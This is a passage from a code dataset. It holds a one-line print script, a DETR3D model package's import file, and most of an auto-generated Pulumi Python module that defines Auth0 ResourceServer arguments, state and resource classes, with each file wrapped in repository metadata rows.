] | null | null | null | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
] | null | null | null | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
] | null | null | null | print("zheshiyigeceshiwenjian")
| 16 | 31 | 0.84375 | 2 | 32 | 13.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 32 | 1 | 32 | 32 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0.6875 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
797ac7f053eeeb82ab427a85f5b5fae96f4845cc | 325 | py | Python | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 237 | 2021-10-13T05:29:29.000Z | 2022-03-31T13:04:13.000Z | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 23 | 2021-10-20T13:57:27.000Z | 2022-03-30T08:03:19.000Z | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 47 | 2021-10-14T05:38:30.000Z | 2022-03-31T09:15:59.000Z | from .dgcnn_attn import DGCNNAttn
from .detr import Deformable3DDetrTransformerDecoder
from .detr3d_transformer import Detr3DTransformer, Detr3DTransformerDecoder, Detr3DCrossAtten
__all__ = ['DGCNNAttn', 'Deformable3DDetrTransformerDecoder',
'Detr3DTransformer', 'Detr3DTransformerDecoder', 'Detr3DCrossAtten']
| 46.428571 | 93 | 0.827692 | 22 | 325 | 11.954545 | 0.590909 | 0.311787 | 0.43346 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.104615 | 325 | 6 | 94 | 54.166667 | 0.872852 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.178462 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
79d80d7b929ca783e6014ca9338aa9d5875d403a | 38,764 | py | Python | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 15 | 2020-05-19T13:46:53.000Z | 2022-02-24T05:09:57.000Z | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 71 | 2020-05-18T22:56:21.000Z | 2022-03-31T15:19:49.000Z | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-10-30T10:06:00.000Z | 2022-02-26T02:39:40.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ResourceServerArgs', 'ResourceServer']
@pulumi.input_type
class ResourceServerArgs:
    """Typed bundle of constructor arguments for the ResourceServer resource.

    Generated by the Pulumi Terraform Bridge (see file header); every field is
    optional and stored via ``pulumi.set`` only when explicitly provided.
    """
    def __init__(__self__, *,
                 allow_offline_access: Optional[pulumi.Input[bool]] = None,
                 enforce_policies: Optional[pulumi.Input[bool]] = None,
                 identifier: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]] = None,
                 signing_alg: Optional[pulumi.Input[str]] = None,
                 signing_secret: Optional[pulumi.Input[str]] = None,
                 skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
                 token_dialect: Optional[pulumi.Input[str]] = None,
                 token_lifetime: Optional[pulumi.Input[int]] = None,
                 token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
                 verification_location: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ResourceServer resource.
        :param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
        :param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
        :param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
        :param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
        :param pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
        :param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
        :param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
        :param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
        :param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
        :param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
        :param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
        :param pulumi.Input[str] verification_location: String
        """
        # Record only the values the caller actually supplied; arguments left
        # as None are skipped so they never appear on the input type.
        if allow_offline_access is not None:
            pulumi.set(__self__, "allow_offline_access", allow_offline_access)
        if enforce_policies is not None:
            pulumi.set(__self__, "enforce_policies", enforce_policies)
        if identifier is not None:
            pulumi.set(__self__, "identifier", identifier)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if options is not None:
            pulumi.set(__self__, "options", options)
        if scopes is not None:
            pulumi.set(__self__, "scopes", scopes)
        if signing_alg is not None:
            pulumi.set(__self__, "signing_alg", signing_alg)
        if signing_secret is not None:
            pulumi.set(__self__, "signing_secret", signing_secret)
        if skip_consent_for_verifiable_first_party_clients is not None:
            pulumi.set(__self__, "skip_consent_for_verifiable_first_party_clients", skip_consent_for_verifiable_first_party_clients)
        if token_dialect is not None:
            pulumi.set(__self__, "token_dialect", token_dialect)
        if token_lifetime is not None:
            pulumi.set(__self__, "token_lifetime", token_lifetime)
        if token_lifetime_for_web is not None:
            pulumi.set(__self__, "token_lifetime_for_web", token_lifetime_for_web)
        if verification_location is not None:
            pulumi.set(__self__, "verification_location", verification_location)
    # Each property below pairs a getter — exposed under its camelCase Pulumi
    # wire name via @pulumi.getter(name=...) where it differs from the Python
    # attribute — with a setter that writes through pulumi.set.
    @property
    @pulumi.getter(name="allowOfflineAccess")
    def allow_offline_access(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
        """
        return pulumi.get(self, "allow_offline_access")
    @allow_offline_access.setter
    def allow_offline_access(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_offline_access", value)
    @property
    @pulumi.getter(name="enforcePolicies")
    def enforce_policies(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not authorization polices are enforced.
        """
        return pulumi.get(self, "enforce_policies")
    @enforce_policies.setter
    def enforce_policies(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enforce_policies", value)
    @property
    @pulumi.getter
    def identifier(self) -> Optional[pulumi.Input[str]]:
        """
        String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
        """
        return pulumi.get(self, "identifier")
    @identifier.setter
    def identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identifier", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        String. Friendly name for the resource server. Cannot include `<` or `>` characters.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def options(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map(String). Used to store additional metadata
        """
        return pulumi.get(self, "options")
    @options.setter
    def options(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "options", value)
    @property
    @pulumi.getter
    def scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]:
        """
        Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
        """
        return pulumi.get(self, "scopes")
    @scopes.setter
    def scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]):
        pulumi.set(self, "scopes", value)
    @property
    @pulumi.getter(name="signingAlg")
    def signing_alg(self) -> Optional[pulumi.Input[str]]:
        """
        String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
        """
        return pulumi.get(self, "signing_alg")
    @signing_alg.setter
    def signing_alg(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "signing_alg", value)
    @property
    @pulumi.getter(name="signingSecret")
    def signing_secret(self) -> Optional[pulumi.Input[str]]:
        """
        String. Secret used to sign tokens when using symmetric algorithms (HS256).
        """
        return pulumi.get(self, "signing_secret")
    @signing_secret.setter
    def signing_secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "signing_secret", value)
    @property
    @pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
    def skip_consent_for_verifiable_first_party_clients(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
        """
        return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
    @skip_consent_for_verifiable_first_party_clients.setter
    def skip_consent_for_verifiable_first_party_clients(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "skip_consent_for_verifiable_first_party_clients", value)
    @property
    @pulumi.getter(name="tokenDialect")
    def token_dialect(self) -> Optional[pulumi.Input[str]]:
        """
        String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
        """
        return pulumi.get(self, "token_dialect")
    @token_dialect.setter
    def token_dialect(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token_dialect", value)
    @property
    @pulumi.getter(name="tokenLifetime")
    def token_lifetime(self) -> Optional[pulumi.Input[int]]:
        """
        Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
        """
        return pulumi.get(self, "token_lifetime")
    @token_lifetime.setter
    def token_lifetime(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "token_lifetime", value)
    @property
    @pulumi.getter(name="tokenLifetimeForWeb")
    def token_lifetime_for_web(self) -> Optional[pulumi.Input[int]]:
        """
        Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
        """
        return pulumi.get(self, "token_lifetime_for_web")
    @token_lifetime_for_web.setter
    def token_lifetime_for_web(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "token_lifetime_for_web", value)
    @property
    @pulumi.getter(name="verificationLocation")
    def verification_location(self) -> Optional[pulumi.Input[str]]:
        """
        String
        """
        return pulumi.get(self, "verification_location")
    @verification_location.setter
    def verification_location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "verification_location", value)
@pulumi.input_type
class _ResourceServerState:
    """State snapshot used when looking up / importing an existing ResourceServer.

    Generated by the Pulumi Terraform Bridge (see file header); it mirrors
    ResourceServerArgs field-for-field, but describes recorded state rather
    than constructor arguments.
    """
    def __init__(__self__, *,
                 allow_offline_access: Optional[pulumi.Input[bool]] = None,
                 enforce_policies: Optional[pulumi.Input[bool]] = None,
                 identifier: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]] = None,
                 signing_alg: Optional[pulumi.Input[str]] = None,
                 signing_secret: Optional[pulumi.Input[str]] = None,
                 skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
                 token_dialect: Optional[pulumi.Input[str]] = None,
                 token_lifetime: Optional[pulumi.Input[int]] = None,
                 token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
                 verification_location: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ResourceServer resources.
        :param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
        :param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
        :param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
        :param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
        :param pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
        :param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
        :param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
        :param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
        :param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
        :param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
        :param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
        :param pulumi.Input[str] verification_location: String
        """
        # Record only the values the caller actually supplied; arguments left
        # as None are skipped so they never appear on the state object.
        if allow_offline_access is not None:
            pulumi.set(__self__, "allow_offline_access", allow_offline_access)
        if enforce_policies is not None:
            pulumi.set(__self__, "enforce_policies", enforce_policies)
        if identifier is not None:
            pulumi.set(__self__, "identifier", identifier)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if options is not None:
            pulumi.set(__self__, "options", options)
        if scopes is not None:
            pulumi.set(__self__, "scopes", scopes)
        if signing_alg is not None:
            pulumi.set(__self__, "signing_alg", signing_alg)
        if signing_secret is not None:
            pulumi.set(__self__, "signing_secret", signing_secret)
        if skip_consent_for_verifiable_first_party_clients is not None:
            pulumi.set(__self__, "skip_consent_for_verifiable_first_party_clients", skip_consent_for_verifiable_first_party_clients)
        if token_dialect is not None:
            pulumi.set(__self__, "token_dialect", token_dialect)
        if token_lifetime is not None:
            pulumi.set(__self__, "token_lifetime", token_lifetime)
        if token_lifetime_for_web is not None:
            pulumi.set(__self__, "token_lifetime_for_web", token_lifetime_for_web)
        if verification_location is not None:
            pulumi.set(__self__, "verification_location", verification_location)
    # Each property below pairs a getter — exposed under its camelCase Pulumi
    # wire name via @pulumi.getter(name=...) where it differs from the Python
    # attribute — with a setter that writes through pulumi.set.
    @property
    @pulumi.getter(name="allowOfflineAccess")
    def allow_offline_access(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
        """
        return pulumi.get(self, "allow_offline_access")
    @allow_offline_access.setter
    def allow_offline_access(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_offline_access", value)
    @property
    @pulumi.getter(name="enforcePolicies")
    def enforce_policies(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not authorization polices are enforced.
        """
        return pulumi.get(self, "enforce_policies")
    @enforce_policies.setter
    def enforce_policies(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enforce_policies", value)
    @property
    @pulumi.getter
    def identifier(self) -> Optional[pulumi.Input[str]]:
        """
        String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
        """
        return pulumi.get(self, "identifier")
    @identifier.setter
    def identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identifier", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        String. Friendly name for the resource server. Cannot include `<` or `>` characters.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def options(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map(String). Used to store additional metadata
        """
        return pulumi.get(self, "options")
    @options.setter
    def options(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "options", value)
    @property
    @pulumi.getter
    def scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]:
        """
        Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
        """
        return pulumi.get(self, "scopes")
    @scopes.setter
    def scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]):
        pulumi.set(self, "scopes", value)
    @property
    @pulumi.getter(name="signingAlg")
    def signing_alg(self) -> Optional[pulumi.Input[str]]:
        """
        String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
        """
        return pulumi.get(self, "signing_alg")
    @signing_alg.setter
    def signing_alg(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "signing_alg", value)
    @property
    @pulumi.getter(name="signingSecret")
    def signing_secret(self) -> Optional[pulumi.Input[str]]:
        """
        String. Secret used to sign tokens when using symmetric algorithms (HS256).
        """
        return pulumi.get(self, "signing_secret")
    @signing_secret.setter
    def signing_secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "signing_secret", value)
    @property
    @pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
    def skip_consent_for_verifiable_first_party_clients(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
        """
        return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
    @skip_consent_for_verifiable_first_party_clients.setter
    def skip_consent_for_verifiable_first_party_clients(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "skip_consent_for_verifiable_first_party_clients", value)
    @property
    @pulumi.getter(name="tokenDialect")
    def token_dialect(self) -> Optional[pulumi.Input[str]]:
        """
        String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
        """
        return pulumi.get(self, "token_dialect")
    @token_dialect.setter
    def token_dialect(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token_dialect", value)
    @property
    @pulumi.getter(name="tokenLifetime")
    def token_lifetime(self) -> Optional[pulumi.Input[int]]:
        """
        Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
        """
        return pulumi.get(self, "token_lifetime")
    @token_lifetime.setter
    def token_lifetime(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "token_lifetime", value)
    @property
    @pulumi.getter(name="tokenLifetimeForWeb")
    def token_lifetime_for_web(self) -> Optional[pulumi.Input[int]]:
        """
        Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
        """
        return pulumi.get(self, "token_lifetime_for_web")
    @token_lifetime_for_web.setter
    def token_lifetime_for_web(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "token_lifetime_for_web", value)
    @property
    @pulumi.getter(name="verificationLocation")
    def verification_location(self) -> Optional[pulumi.Input[str]]:
        """
        String
        """
        return pulumi.get(self, "verification_location")
    @verification_location.setter
    def verification_location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "verification_location", value)
class ResourceServer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
With this resource, you can set up APIs that can be consumed from your authorized applications.
## Example Usage
```python
import pulumi
import pulumi_auth0 as auth0
my_resource_server = auth0.ResourceServer("myResourceServer",
allow_offline_access=True,
identifier="https://api.example.com",
scopes=[
auth0.ResourceServerScopeArgs(
description="Create foos",
value="create:foo",
),
auth0.ResourceServerScopeArgs(
description="Create bars",
value="create:bar",
),
],
signing_alg="RS256",
skip_consent_for_verifiable_first_party_clients=True,
token_lifetime=8600)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ResourceServerArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
With this resource, you can set up APIs that can be consumed from your authorized applications.
## Example Usage
```python
import pulumi
import pulumi_auth0 as auth0
my_resource_server = auth0.ResourceServer("myResourceServer",
allow_offline_access=True,
identifier="https://api.example.com",
scopes=[
auth0.ResourceServerScopeArgs(
description="Create foos",
value="create:foo",
),
auth0.ResourceServerScopeArgs(
description="Create bars",
value="create:bar",
),
],
signing_alg="RS256",
skip_consent_for_verifiable_first_party_clients=True,
token_lifetime=8600)
```
:param str resource_name: The name of the resource.
:param ResourceServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourceServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourceServerArgs.__new__(ResourceServerArgs)
__props__.__dict__["allow_offline_access"] = allow_offline_access
__props__.__dict__["enforce_policies"] = enforce_policies
__props__.__dict__["identifier"] = identifier
__props__.__dict__["name"] = name
__props__.__dict__["options"] = options
__props__.__dict__["scopes"] = scopes
__props__.__dict__["signing_alg"] = signing_alg
__props__.__dict__["signing_secret"] = signing_secret
__props__.__dict__["skip_consent_for_verifiable_first_party_clients"] = skip_consent_for_verifiable_first_party_clients
__props__.__dict__["token_dialect"] = token_dialect
__props__.__dict__["token_lifetime"] = token_lifetime
__props__.__dict__["token_lifetime_for_web"] = token_lifetime_for_web
__props__.__dict__["verification_location"] = verification_location
super(ResourceServer, __self__).__init__(
'auth0:index/resourceServer:ResourceServer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None) -> 'ResourceServer':
"""
Get an existing ResourceServer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResourceServerState.__new__(_ResourceServerState)
__props__.__dict__["allow_offline_access"] = allow_offline_access
__props__.__dict__["enforce_policies"] = enforce_policies
